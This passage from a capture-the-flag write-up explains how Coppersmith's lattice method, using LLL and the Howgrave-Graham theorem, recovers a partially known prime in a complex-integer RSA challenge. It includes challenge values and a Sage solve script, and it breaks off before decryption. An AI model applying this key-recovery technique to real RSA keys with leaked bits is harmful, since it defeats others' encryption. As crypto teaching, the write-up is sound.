  <li>The length of the coefficient vector of $g(R \cdot x)$ is small. (The coefficient vector refers to the vector containing the
  coefficients of each term in our polynomial $[a_n, a_{n-1}, \dots, a_1, a_0]$.)
    <ul>
      <li>Small is once again defined as being less than some bound based on $b, k$ and the degree of $g(x)$. However, it’s
  not relevant to us because we will fulfill it at the end. (Haha! This might be foreshadowing.)</li>
    </ul>
  </li>
</ul>

<p>then $g(x_0) = 0$ over the integers too. That is, $x_0$ is an integer root.</p>
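
<p>For the curious, here is a sketch of why this works. It assumes the usual explicit form of the third condition, which is not spelled out above: the Euclidean length of the coefficient vector of $g(Rx)$ is below $b^k/\sqrt{n}$, where $n$ is the number of terms of $g$ and $c_i$ are its coefficients.</p>

<p>$$|g(x_0)| = \left|\sum_i c_i x_0^i\right| \le \sum_i |c_i| R^i \le \sqrt{n}\,\|g(Rx)\| \lt \sqrt{n} \cdot \frac{b^k}{\sqrt{n}} = b^k$$</p>

<p>The second inequality is Cauchy-Schwarz applied to the $n$ scaled coefficients $c_i R^i$. Since $g(x_0)$ is a multiple of $b^k$ whose absolute value is below $b^k$, it has to be exactly zero.</p>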

<p>Great! Let’s use this on $f(x)$. Well… we can’t use it just yet because the coefficients of the polynomial $f(R\cdot x)$ are
<strong>huge</strong>. In particular, the constant term $a$ has the same number of digits as $p$. This fails the third condition in
the Howgrave-Graham theorem, which wants a small coefficient vector. Fortunately, there’s a way to fix this.</p>

<h3 id="reducing-the-size-of-our-massive-polynomials">Reducing the Size of our Massive Polynomials</h3>

<p>At first glance, it seems difficult to reduce the size of our coefficients. However, all we need is a small cameo
from our good old friend: linear combinations.</p>

<p>Suppose I had two polynomials $a(x)$ and $b(x)$ such that $a(x_0) \equiv b(x_0) \equiv 0 \text{ (mod m)}$ for some
integers $m$ and $x_0$. Note that $a(x_0)$ doesn’t necessarily equal $b(x_0)$. Now, we have that $a(x_0) + b(x_0)
\equiv 0 \text{ (mod m)}$. Trivially, we also have that $l \cdot a(x_0) \equiv 0 \text{ (mod m)}$ for any integer $l$.
Thus, for any integers $l$ and $k$, we get $l \cdot a(x_0) + k \cdot b(x_0) \equiv 0 \text{ (mod m)}$.</p>

<p>In summary, we just showed that any <em>integer</em> linear combination of two polynomials preserves the root
$x_0$ modulo $m$.
So, this means that if we can find other polynomials which have the same root, $x_0$, as $f(Rx)$ (and $f(x)$) modulo $p$, then we can
craft an integer linear combination between them to reduce the size of our coefficients. (Note: this is similar to the
idea of row reductions in matrix algebra).</p>
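
<p>This property is easy to verify numerically. The sketch below uses a toy modulus and two toy polynomials, all picked for this example, that share the root $x_0 = 3$ modulo $7$.</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code>m, x0 = 7, 3


def a(x):
    return x + 4          # a(3) = 7, a multiple of m


def b(x):
    return x * x + 5      # b(3) = 14, a multiple of m


# Every integer combination ell*a + k*b should still vanish at x0 modulo m.
combos_ok = all(
    (ell * a(x0) + k * b(x0)) % m == 0
    for ell in range(-5, 6)
    for k in range(-5, 6)
)
print(combos_ok)
</code></pre></div></div>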

<h3 id="a-trick-to-create-unlimited-polynomials">A Trick to Create Unlimited Polynomials</h3>

<p>Our long chain of dominos continues as we search for polynomials with the same root $x_0$ as $f(x)$ over our modulus p.
For convenience, I will call this set of polynomials $F$. The problem is we don’t know $p$, so we can’t make polynomials
like $g(x) = px^2 + 4px + p^3$ which will always be 0 modulo $p$ for all values of $x$. (They’re not particularly useful either).
Let’s use some clever tricks instead.</p>

<ul>
  <li>Firstly, we know $N$, which is a multiple of $p$, so $g(x) = N \equiv 0 \text{ (mod p)}$ for all $x$ including $x_0$.
  Let’s add it to $F$.</li>
  <li>Next, we have that $f(x_0) \equiv 0 \text{ (mod p)}$. We could square both sides and get:
  $[f(x_0)]^2 \equiv 0 \text{ (mod p)}$. Nice! Let’s add $[f(Rx)]^2$ to $F$.</li>
  <li>Why stop there? We can just continue raising $f(Rx)$ to various integer powers and have the same outcome as above. We
  can thus add all the powers of $f(Rx)$ to $F$.</li>
</ul>

<p>Now, we have a long list of polynomials to choose from. An alternative to this method would be to simply multiply $f(Rx)$
by different powers of $x$. However, the downside of that alternative is that we would lose the constant term in the elements
of $F$. The powers of $f(Rx)$ are much more elegant in the sense that, due to the binomial theorem, we are bound to have
constant terms.</p>

<h3 id="the-magical-mysteries-of-the-lattice-and-lll">The Magical Mysteries of the Lattice and LLL</h3>

<p>We have a list of polynomials with the same root $x_0$ whose coefficients we seek to reduce through their integer linear
combinations. It remains to be asked: “How do we determine the most efficient integer linear combinations?” It’s time to
introduce Lattices and LLL.</p>

<hr />
<h3 id="introducing-our-new-show-decomplexify-this">Introducing our New Show: DeComplexify This!</h3>

<p>Today, we will be learning what a lattice is and how LLL might help with our little predicament. Recall that if we were working
with the Real numbers, we could simply use a matrix to reduce the size of a basis and make it orthogonal using the
Gram-Schmidt method. However, we are working over the Integers, where the same strategy cannot be used.</p>

<p>Introducing the Lattice. No, not the lattice from Organic Chemistry. An n x n (integer) lattice is essentially just like an
n x n matrix with two exceptions:</p>
<ul>
  <li>All the elements in our lattice are integers.</li>
  <li>The span of our vectors refers to just the <em>integer</em> linear combinations (instead of the real-coefficient combinations used for matrices).</li>
</ul>

<p>To clarify: We will exclusively be talking about integer lattices, hereby referred to as just lattices.</p>

<p>As with a matrix, we can express our polynomial $f(Rx)$ in the form of a row vector. In fact, you’ve already seen this
before in the form of our coefficient vectors.</p>

<p><img src="/assets/images/sdctf-2024/reallycomplexproblem/coefficient_vec.png" alt="" /></p>

<p>We can create a matrix using some of our polynomials in $F$, where each row is a polynomial and each column represents
the coefficients of a power of $x$. For example, we can use the polynomials $g(x) = N$, $f(Rx)$, and $[f(Rx)]^2$.</p>

<p><img src="/assets/images/sdctf-2024/reallycomplexproblem/3x3_lattice.png" alt="" /></p>
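
<p>To make the construction concrete, here is a sketch that builds these three rows from toy numbers. The values of <code class="language-plaintext highlighter-rouge">N</code>, <code class="language-plaintext highlighter-rouge">a</code> and <code class="language-plaintext highlighter-rouge">R</code> and the helper names are assumptions for illustration, and the rows are stored with the constant term first, which may differ from the column order in the picture.</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def poly_mul(u, v):
    # Multiply two polynomials given as coefficient lists (constant term first).
    out = [0] * (len(u) + len(v) - 1)
    for i, ui in enumerate(u):
        for j, vj in enumerate(v):
            out[i + j] += ui * vj
    return out


def pad(row, width):
    # Fill the missing higher powers of x with zeros.
    return row + [0] * (width - len(row))


N = 38237 * 101          # toy modulus
a, R = 38200, 100        # toy known part of p and bound on the unknown part

f_scaled = [a, R]        # f(Rx) = a + R*x
rows = [
    pad([N], 3),                     # g(x) = N
    pad(f_scaled, 3),                # f(Rx)
    poly_mul(f_scaled, f_scaled),    # f(Rx)^2
]
for row in rows:
    print(row)
</code></pre></div></div>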

<p>Now that we have constructed our lattice, let me introduce the LLL algorithm (Lenstra-Lenstra-Lovász). I won’t be going
over the nitty-gritty details of this algorithm and will instead treat this as a black box. This algorithm takes in a
lattice basis (Basis has the same meaning as in matrix algebra) and outputs a basis of the same lattice whose vectors are
shorter and closer to orthogonal. You can read about it more in this wonderful <a href="https://eprint.iacr.org/2023/032.pdf">tutorial</a>. A fun exercise is
justifying to yourself that our row vectors are linearly independent.</p>

<hr />

<p>Once we apply the LLL algorithm on this lattice, our rows, representing polynomials, will now have smaller coefficients.
Take one of these reduced rows as a polynomial $h$. Since the length of its coefficient vector is smaller (which is what LLL gives us), we can apply Howgrave-Graham’s theorem in
order to find $x_0$ by finding the roots of $h(x)$ over the integers. Note that the resulting row vectors will be of the
form $h(Rx)$. We simply divide the coefficient of each $x^i$ by $R^i$ to retrieve $h(x)$.</p>
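
<p>Undoing the scaling can be sketched as follows. The reduced row here is hypothetical (it was written by hand, not produced by LLL), it is stored with the constant term first, and the brute-force root search only makes sense because the toy bound is tiny.</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def unscale(row, R):
    # Coefficient i of h(Rx) is c_i * R**i, so divide it by R**i to get c_i.
    return [c // R ** i for i, c in enumerate(row)]


def evaluate(coeffs, x):
    return sum(c * x ** i for i, c in enumerate(coeffs))


R = 100
reduced_row = [-74, -3500, 10000]     # hypothetical h(Rx), constant term first
h = unscale(reduced_row, R)

# Toy-sized search for integer roots with absolute value below R.
roots = [x for x in range(-R + 1, R) if evaluate(h, x) == 0]
print(h, roots)
</code></pre></div></div>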

<p>We have successfully found $r$ (our $x_0$) and we can reconstruct $p$ by $a + r$. Victory! We solved our simpler RSA
problem. Now, to deal with something more complex. (literally)</p>

<h2 id="the-complexities-of-complex-numbers">The Complexities of Complex Numbers</h2>

<p>The question now is: “Can we do the same for our complex integers?” The answer is <strong><em>mostly</em></strong>. While most of the
theorems extend to the Complex Integers, LLL only operates over the regular integers. To understand how we overcome
this problem, let’s first go through our solution till our roadblock.</p>

<ol>
  <li>Write down <code class="language-plaintext highlighter-rouge">N</code> and the known part of <code class="language-plaintext highlighter-rouge">p</code>
    <div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">N</span> <span class="o">=</span> <span class="o">-</span><span class="mi">117299665605343495500066013555546076891571528636736883265983243281045565874069282036132569271343532425435403925990694272204217691971976685920273893973797616802516331406709922157786766589075886459162920695874603236839806916925542657466542953678792969287219257233403203242858179791740250326198622797423733569670</span> <span class="o">+</span> <span class="mi">617172569155876114160249979318183957086418478036314203819815011219450427773053947820677575617572314219592171759604357329173777288097332855501264419608220917546700717670558690359302077360008042395300149918398522094125315589513372914540059665197629643888216132356902179279651187843326175381385350379751159740993</span><span class="o">*</span><span class="n">I</span>
<span class="n">a</span> <span class="o">=</span> <span class="mi">1671911043329305519973004484847472037065973037107329742284724545409541682312778072234</span> <span class="o">*</span> <span class="mi">10</span><span class="o">^</span><span class="mi">70</span> <span class="o">+</span> <span class="mi">193097758392744599866999513352336709963617764800771451559221624428090414152709219472155</span> <span class="o">*</span> <span class="mi">10</span><span class="o">^</span><span class="mi">68</span> <span class="o">*</span> <span class="n">I</span>
</code></pre></div>    </div>
  </li>
  <li>At the same time as finding <code class="language-plaintext highlighter-rouge">a</code>, we can define our upper bound $R$ as $R_r$ and $R_i$ for the bounds of the real and
imaginary parts of <code class="language-plaintext highlighter-rouge">r</code>. Since the primes will always have about 155 digits (this could be verified with a bit of
testing/bruteforcing other limits), the known parts above give $R_r = 10^{70}$ and $R_i = 10^{68}$.</li>
  <li>Our $f(x) = a + x$. Instead of this, we can choose to be more verbose and write it as $a + bi + x + i \cdot x$. Here,
we treat $i$ similar to a variable and all the coefficients (like $a$ and $b$) are real integers.</li>
  <li>We do the same process as before to generate different powers of $f((R_r + R_i \cdot i)x)$ modulo p. (refer to the
challenge code to see how you can take the modulo under a complex number)</li>
  <li>Now, we hit our roadblock of representing our polynomials as row vectors of integers. Well, we could simply double
the columns (adding an imaginary part to each power of $x$). This looks like…
<img src="/assets/images/sdctf-2024/reallycomplexproblem/imaginary_vec.png" alt="" />
    <ul>
      <li>One more note: we can double our set from before by adding the imaginary multiples of each polynomial, such as $-i\cdot f(Rx)$.</li>
    </ul>
  </li>
  <li>Construct a matrix with a lot of these row vectors and perform LLL.
    <ul>
      <li>The reason we need a lot of polynomials has to do with the Howgrave-Graham theorem, which essentially ends up
  requiring more rows for a greater chance of finding our root.</li>
    </ul>
  </li>
  <li>Find the root of the reduced polynomial over the Complex Integers.</li>
  <li>Retrieve <code class="language-plaintext highlighter-rouge">r</code> and thus find $p$</li>
  <li>Use $p$ to find $q$ and then find $d$ and use $d$ to decrypt our ciphertext given by:
    <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>e = 65537
ciphertext = 49273345737246996726590603353583355178086800698760969592130868354337851978351471620667942269644899697191123465795949428583500297970396171368191380368221413824213319974264518589870025675552877945771766939806196622646891697942424667182133501533291103995066016684839583945343041150542055544031158418413191646229 - 258624816670939796343917171898007336047104253546023541021805133600172647188279270782668737543819875707355397458629869509819636079018227591566061982865881273727207354775997401017597055968919568730868113094991808052722711447543117755613371129719806669399182197476597667418343491111520020195254569779326204447367 * I
</code></pre></div>    </div>
  </li>
</ol>
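
<p>To make the “double the columns” step concrete, here is a minimal sketch in plain Python (not Sage). It assumes each coefficient is given as an <code class="language-plaintext highlighter-rouge">(re, im)</code> integer pair with the constant term first; the name <code class="language-plaintext highlighter-rouge">scaled_rows</code> is made up for illustration. Like the solve script further down, it multiplies by $i$ rather than $-i$ for the second row, which only flips the sign of that row and so spans the same lattice.</p>

```python
def scaled_rows(coeffs, R_r, R_i):
    """Turn a polynomial with Gaussian-integer coefficients into two integer rows.

    coeffs: list of (re, im) pairs, constant term first (hypothetical input format).
    R_r, R_i: upper bounds on the real and imaginary parts of the root.
    """
    regular, imag_multiple = [], []
    for power, (re, im) in enumerate(coeffs):
        # Each power of x gets two columns: real part, then imaginary part.
        regular += [re * R_r**power, im * R_i**power]
        # i * (re + im*i) = -im + re*i
        imag_multiple += [-im * R_r**power, re * R_i**power]
    return regular, imag_multiple


# f(x) = (3 + 2i) + (1 - 4i) x with toy bounds 10 and 100
regular, imag_multiple = scaled_rows([(3, 2), (1, -4)], R_r=10, R_i=100)
print(regular)        # [3, 2, 10, -400]
print(imag_multiple)  # [-2, 3, 40, 100]
```

<p>Every polynomial therefore contributes two rows, and every power of $x$ contributes two columns.</p>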

<p>Wow, we did it! oh no… It did not work :(</p>

<h2 id="why-doesnt-it-work">WHY DOESNT IT WORK!!</h2>

<p>The short answer is that we need to modify our choice of polynomials because it still fails the conditions for the
Howgrave-Graham theorem. Recall that the Howgrave-Graham theorem limits our choices of $b$, $k$, and the degree of the
polynomial. For the theorem, we need $f(x_0) \equiv 0 \text{ (mod }b^k\text{)}$. Previously, we just set $b^k = p$ and
called it a day. However, as shown through a long series of proofs that are very well highlighted on this <a href="https://www.klwu.co/maths-in-crypto/lattice-2/#howgrave-grahams-formulation">blog</a>,
this can be very inefficient and makes the maximum upper bound for $R$ end up being very small. The
maximum bound is usually defined by some relation $X \approx N^\frac{1}{c(d)}$ where $c(d)$ is a function that depends
on the degree, $d$, of our polynomial. Understanding this, our goal is to reduce the growth of $c(d)$ as much
as possible. We will be using two techniques to do this (from the same blog post).</p>

<hr />
<h3 id="the-first-technique">The First Technique:</h3>

<p>Rather than considering $b^k = p$, we could instead try $b = p$. This would ultimately help increase our upper bound (as
described in the blog if you are curious). What changes? Well, unfortunately $f(x_0) \equiv 0 \text{ (mod }p^k\text{)}$
is no longer true. However, this might actually be useful.</p>

<p>I will leave this as an exercise to the curious readers, but it’s trivial to observe that if an integer $a$ divides $b$,
then $a^k$ divides $b^k$. Also, if $a$ divides $c$ as well, then $a^k$ divides $c^{i}b^{k - i}$ for any integer $i$ with
$0 \le i \le k$. This implies that if we have two polynomials $a(x)$ and $b(x)$ such that $a(x_0)
\equiv b(x_0) \equiv 0 \text{ (mod }m\text{)}$ for some integer $m$, then $[a(x_0)]^i[b(x_0)]^{k - i} \equiv 0 \text{ (mod
}m^k\text{)}$.</p>
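
<p>The reasoning is short: if $a(x_0) = m \cdot s$ and $b(x_0) = m \cdot t$, then $[a(x_0)]^i[b(x_0)]^{k-i} = m^k \cdot s^i t^{k-i}$. Here is a quick numeric sanity check in plain Python with small made-up numbers (the helper name <code class="language-plaintext highlighter-rouge">products_vanish</code> is just for illustration):</p>

```python
def products_vanish(a_val, b_val, m, k):
    """Check that a_val^i * b_val^(k-i) is 0 mod m^k for every i in 0..k."""
    return all((a_val**i * b_val**(k - i)) % m**k == 0 for i in range(k + 1))


m, k = 7, 4
print(products_vanish(3 * m, 10 * m, m, k))      # True: both values are multiples of m
print(products_vanish(3 * m + 1, 10 * m, m, k))  # False: the first value is not a multiple of m
```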

<p>So, let’s use the two polynomials we know are divisible by $p$ at $x_0$: $N$ and $f(Rx)$. (Yes, $N$ is a polynomial that
equates to a constant.) Now, instead of using powers of $f(Rx)$ alone, we can add polynomials of the form
$[f(Rx)]^i[N]^{k - i}$ for each integer $i \in [0, k - 1]$ to our set $F$.</p>
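
<p>As a rough illustration, the sketch below builds these polynomials over the ordinary integers instead of the complex integers, with tiny made-up primes and without the scaling by $R$. All helper names are hypothetical. It only checks the property we care about: every polynomial in the family vanishes modulo $p^k$ at $x_0$, while $f$ on its own only vanishes modulo $p$.</p>

```python
def poly_mul(a, b):
    """Multiply two polynomials given as coefficient lists (constant term first)."""
    out = [0] * (len(a) + len(b) - 1)
    for i, x in enumerate(a):
        for j, y in enumerate(b):
            out[i + j] += x * y
    return out


def poly_pow(f, n):
    result = [1]
    for _ in range(n):
        result = poly_mul(result, f)
    return result


def poly_eval(f, x):
    return sum(c * x**j for j, c in enumerate(f))


# Toy setup: p = a + x0 with a known and x0 small
p, q = 101, 103
N = p * q
x0 = 5
a = p - x0
f = [a, 1]  # f(x) = x + a, so f(x0) = p
k = 3

# First technique: f^i * N^(k - i) for i = 0 .. k - 1
first_family = [[c * N**(k - i) for c in poly_pow(f, i)] for i in range(k)]

print(all(poly_eval(g, x0) % p**k == 0 for g in first_family))  # True
print(poly_eval(f, x0) % p**k == 0)                             # False
```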

<p>Note that for our complex integers, whenever I add a polynomial $g(x)$ to $F$, I’m also adding its imaginary multiple
$-i\cdot g(x)$ to the set. This simply helps with the lattice reduction by giving the LLL algorithm more options to
reduce our polynomials by.</p>

<h3 id="technique-numero-dos">Technique Numero Dos:</h3>

<p>The second technique, which was discussed directly in the blog, involves multiplying $[f(Rx)]^k$ with various powers of
$x$. Recall that $[f(x_0)]^k \equiv 0 \text{ (mod }p^k\text{)}$. So, we add polynomials of the form $x^i[f(Rx)]^k$ for
each integer $i \in [0, k - 1]$ to our set $F$ (along with their imaginary multiples). Note that there’s nothing really
stopping us from taking a different number of polynomials for the second technique: rather than $k$ polynomials, we
can take $5$ or $4000$, though I’m not sure what the resulting bounds would be.</p>
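
<p>It helps to count how big the resulting lattice is. The sketch below (plain Python, with a made-up helper name) assumes $k$ polynomials from each technique, as in the solve script, and two rows plus two columns per entry because of the real/imaginary split. For a linear $f$ it reproduces the <code class="language-plaintext highlighter-rouge">max_cols = 4 * k</code> used in the solve script.</p>

```python
def lattice_shape(k, deg_f=1):
    """Return (rows, columns) of the lattice built from both techniques."""
    first_degrees = [deg_f * i for i in range(k)]       # f^i * N^(k - i)
    second_degrees = [deg_f * k + i for i in range(k)]  # x^i * f^k
    max_degree = max(first_degrees + second_degrees)
    columns = 2 * (max_degree + 1)                      # real and imaginary column per power of x
    rows = 2 * (len(first_degrees) + len(second_degrees))  # each polynomial plus its imaginary multiple
    return rows, columns


print(lattice_shape(10))  # (40, 40)
```

<p>With a linear $f$ the matrix comes out square, which is what we want to hand to LLL.</p>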

<hr />

<h2 id="back-to-business">Back to business</h2>

<p>Now that we have created a better lattice, we can finally solve our challenge. Nevermind! There were a lot of Sage-specific
bugs that had to be squashed.</p>

<p><em>hours later</em>, we can finally use our script to reverse the encryption and encoding to get our flag.</p>

<h2 id="the-solve-script-finally">The solve script (finally)</h2>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="kn">from</span> <span class="nn">CRSA</span> <span class="kn">import</span> <span class="n">GaussianRational</span><span class="p">,</span> <span class="n">decrypt</span>
<span class="kn">from</span> <span class="nn">fractions</span> <span class="kn">import</span> <span class="n">Fraction</span>
<span class="kn">from</span> <span class="nn">Crypto.Util.number</span> <span class="kn">import</span> <span class="n">long_to_bytes</span>

<span class="n">ciphertext</span> <span class="o">=</span> <span class="mi">49273345737246996726590603353583355178086800698760969592130868354337851978351471620667942269644899697191123465795949428583500297970396171368191380368221413824213319974264518589870025675552877945771766939806196622646891697942424667182133501533291103995066016684839583945343041150542055544031158418413191646229</span> <span class="o">-</span> <span class="mi">258624816670939796343917171898007336047104253546023541021805133600172647188279270782668737543819875707355397458629869509819636079018227591566061982865881273727207354775997401017597055968919568730868113094991808052722711447543117755613371129719806669399182197476597667418343491111520020195254569779326204447367</span> <span class="o">*</span> <span class="n">I</span>
<span class="n">N</span> <span class="o">=</span> <span class="o">-</span><span class="mi">117299665605343495500066013555546076891571528636736883265983243281045565874069282036132569271343532425435403925990694272204217691971976685920273893973797616802516331406709922157786766589075886459162920695874603236839806916925542657466542953678792969287219257233403203242858179791740250326198622797423733569670</span> <span class="o">+</span> <span class="mi">617172569155876114160249979318183957086418478036314203819815011219450427773053947820677575617572314219592171759604357329173777288097332855501264419608220917546700717670558690359302077360008042395300149918398522094125315589513372914540059665197629643888216132356902179279651187843326175381385350379751159740993</span><span class="o">*</span><span class="n">I</span>
<span class="n">a</span> <span class="o">=</span> <span class="mi">1671911043329305519973004484847472037065973037107329742284724545409541682312778072234</span> <span class="o">*</span> <span class="mi">10</span><span class="o">^</span><span class="mi">70</span> <span class="o">+</span> <span class="mi">193097758392744599866999513352336709963617764800771451559221624428090414152709219472155</span> <span class="o">*</span> <span class="mi">10</span><span class="o">^</span><span class="mi">68</span> <span class="o">*</span> <span class="n">I</span>


<span class="c1"># This function takes in our polynomial and returns two rows
# The first row is the coefficient vector, scaled by the upper bounds, of the regular polynomial 
# The second row is the coefficient vector, scaled by the upper bounds, of its imaginary multiple
</span><span class="k">def</span> <span class="nf">get_coefficients</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="n">R_r</span><span class="p">,</span> <span class="n">R_i</span><span class="p">):</span>
     <span class="n">regular</span> <span class="o">=</span> <span class="p">[]</span>
     <span class="n">imag_multiple</span> <span class="o">=</span> <span class="p">[]</span>
     <span class="n">coeffs</span> <span class="o">=</span> <span class="n">f</span><span class="p">.</span><span class="nb">list</span><span class="p">()</span>

     <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">c</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">coeffs</span><span class="p">):</span>
         <span class="n">regular</span><span class="p">.</span><span class="n">extend</span><span class="p">([</span><span class="n">c</span><span class="p">.</span><span class="n">real</span><span class="p">()</span> <span class="o">*</span> <span class="n">R_r</span><span class="o">^</span><span class="n">i</span><span class="p">,</span> <span class="n">c</span><span class="p">.</span><span class="n">imag</span><span class="p">()</span> <span class="o">*</span> <span class="n">R_i</span><span class="o">^</span><span class="n">i</span><span class="p">])</span>

     <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">c</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">coeffs</span><span class="p">):</span>
         <span class="n">imag_multiple</span><span class="p">.</span><span class="n">extend</span><span class="p">([</span><span class="o">-</span><span class="mi">1</span> <span class="o">*</span> <span class="n">c</span><span class="p">.</span><span class="n">imag</span><span class="p">()</span> <span class="o">*</span> <span class="n">R_r</span><span class="o">^</span><span class="n">i</span><span class="p">,</span> <span class="n">c</span><span class="p">.</span><span class="n">real</span><span class="p">()</span> <span class="o">*</span> <span class="n">R_i</span><span class="o">^</span><span class="n">i</span><span class="p">])</span>

     <span class="k">return</span> <span class="p">[</span><span class="n">regular</span><span class="p">,</span> <span class="n">imag_multiple</span><span class="p">]</span>

<span class="c1"># since our row vectors have different lengths, we need to pad them with zeros
# Note that the solve script reverses the columns. The leftmost column is the constant while
# the rightmost column is the coefficient of the highest degree of x
</span><span class="k">def</span> <span class="nf">rpad</span><span class="p">(</span><span class="n">lst</span><span class="p">,</span> <span class="n">length</span><span class="p">):</span>
    <span class="n">result</span> <span class="o">=</span> <span class="p">[]</span>
    <span class="k">for</span> <span class="n">l</span> <span class="ow">in</span> <span class="n">lst</span><span class="p">:</span>
        <span class="n">result</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">l</span> <span class="o">+</span> <span class="p">[</span><span class="mi">0</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">length</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">l</span><span class="p">))])</span>
    <span class="k">return</span> <span class="n">result</span>


<span class="k">def</span> <span class="nf">coppersmith</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="n">R_r</span><span class="p">,</span> <span class="n">R_i</span><span class="p">,</span> <span class="n">N</span><span class="p">,</span>  <span class="n">k</span><span class="p">):</span>
    <span class="c1"># This was the maximum number of columns/entries a row vector has.
</span>    <span class="n">max_cols</span> <span class="o">=</span> <span class="mi">4</span> <span class="o">*</span> <span class="n">k</span>
    <span class="c1"># polynomial row vectors
</span>    <span class="n">polynomial_rows</span> <span class="o">=</span> <span class="p">[]</span>
    <span class="n">x</span> <span class="o">=</span> <span class="n">f</span><span class="p">.</span><span class="n">parent</span><span class="p">().</span><span class="n">gen</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1"># apparently helps sage do its thing
</span>
    <span class="c1"># Add polynomials from our first technique
</span>    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">k</span><span class="p">):</span>
        <span class="n">poly_rows</span> <span class="o">=</span> <span class="n">get_coefficients</span><span class="p">(</span><span class="n">f</span><span class="o">^</span><span class="n">i</span> <span class="o">*</span> <span class="n">N</span><span class="o">^</span><span class="p">(</span><span class="n">k</span><span class="o">-</span><span class="n">i</span><span class="p">),</span> <span class="n">R_r</span><span class="p">,</span> <span class="n">R_i</span><span class="p">)</span>
        <span class="n">poly_rows</span> <span class="o">=</span> <span class="n">rpad</span><span class="p">(</span><span class="n">poly_rows</span><span class="p">,</span> <span class="n">max_cols</span><span class="p">)</span>
        <span class="n">polynomial_rows</span><span class="p">.</span><span class="n">extend</span><span class="p">(</span><span class="n">poly_rows</span><span class="p">)</span>

    <span class="c1"># Add polynomials from our second technique
</span>    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">k</span><span class="p">):</span>
        <span class="n">poly_rows</span> <span class="o">=</span> <span class="n">get_coefficients</span><span class="p">(</span><span class="n">f</span><span class="o">^</span><span class="n">k</span> <span class="o">*</span> <span class="n">x</span><span class="o">^</span><span class="n">i</span><span class="p">,</span> <span class="n">R_r</span><span class="p">,</span> <span class="n">R_i</span><span class="p">)</span> 
        <span class="n">poly_rows</span> <span class="o">=</span> <span class="n">rpad</span><span class="p">(</span><span class="n">poly_rows</span><span class="p">,</span> <span class="n">max_cols</span><span class="p">)</span>
        <span class="n">polynomial_rows</span><span class="p">.</span><span class="n">extend</span><span class="p">(</span><span class="n">poly_rows</span><span class="p">)</span>
    
    <span class="c1"># We perform LLL on our lattice
</span>    <span class="n">M</span> <span class="o">=</span> <span class="n">matrix</span><span class="p">(</span><span class="n">polynomial_rows</span><span class="p">)</span>
    <span class="n">B</span> <span class="o">=</span> <span class="n">M</span><span class="p">.</span><span class="n">LLL</span><span class="p">()</span>

    <span class="c1"># v is the first polynomial from our reduced lattice
</span>    <span class="n">v</span> <span class="o">=</span> <span class="n">B</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> 
    
    <span class="c1"># This section was lifted from the official solve, but just cleans up our polynomial
</span>    <span class="n">Q</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="k">for</span> <span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">i</span><span class="p">)</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="nb">list</span><span class="p">(</span><span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">v</span><span class="p">),</span> <span class="mi">2</span><span class="p">))):</span>
        <span class="n">z</span> <span class="o">=</span> <span class="n">v</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">/</span> <span class="p">(</span><span class="n">R_r</span><span class="o">^</span><span class="n">s</span><span class="p">)</span> <span class="o">+</span> <span class="n">v</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span> <span class="o">/</span> <span class="p">(</span><span class="n">R_i</span><span class="o">^</span><span class="n">s</span><span class="p">)</span> <span class="o">*</span> <span class="n">I</span>
        <span class="n">Q</span> <span class="o">+=</span> <span class="n">z</span> <span class="o">*</span> <span class="n">x</span><span class="o">^</span><span class="n">s</span>

    <span class="k">return</span> <span class="n">Q</span>

<span class="n">R</span><span class="p">.</span><span class="o">&lt;</span><span class="n">x</span><span class="o">&gt;</span> <span class="o">=</span> <span class="n">PolynomialRing</span><span class="p">(</span><span class="n">I</span><span class="p">.</span><span class="n">parent</span><span class="p">(),</span> <span class="s">"x"</span><span class="p">)</span> <span class="c1"># sage once again doing its thing
</span><span class="n">f</span> <span class="o">=</span> <span class="n">x</span> <span class="o">+</span> <span class="n">a</span> <span class="c1"># our beloved polynomial
</span>
<span class="c1"># 10 seemed to be the sweet spot
</span><span class="n">Q</span> <span class="o">=</span> <span class="n">coppersmith</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="mi">10</span><span class="o">^</span><span class="mi">70</span><span class="p">,</span> <span class="mi">10</span><span class="o">^</span><span class="mi">68</span><span class="p">,</span> <span class="n">N</span><span class="p">,</span> <span class="n">k</span><span class="o">=</span><span class="mi">10</span><span class="p">)</span>

<span class="c1"># r = x_0 = Q.roots()[0][0]
</span><span class="n">p</span> <span class="o">=</span> <span class="n">a</span> <span class="o">+</span> <span class="n">Q</span><span class="p">.</span><span class="n">roots</span><span class="p">()[</span><span class="mi">0</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span>


<span class="c1"># Now we cast the values we calculated to GaussianRationals and find q
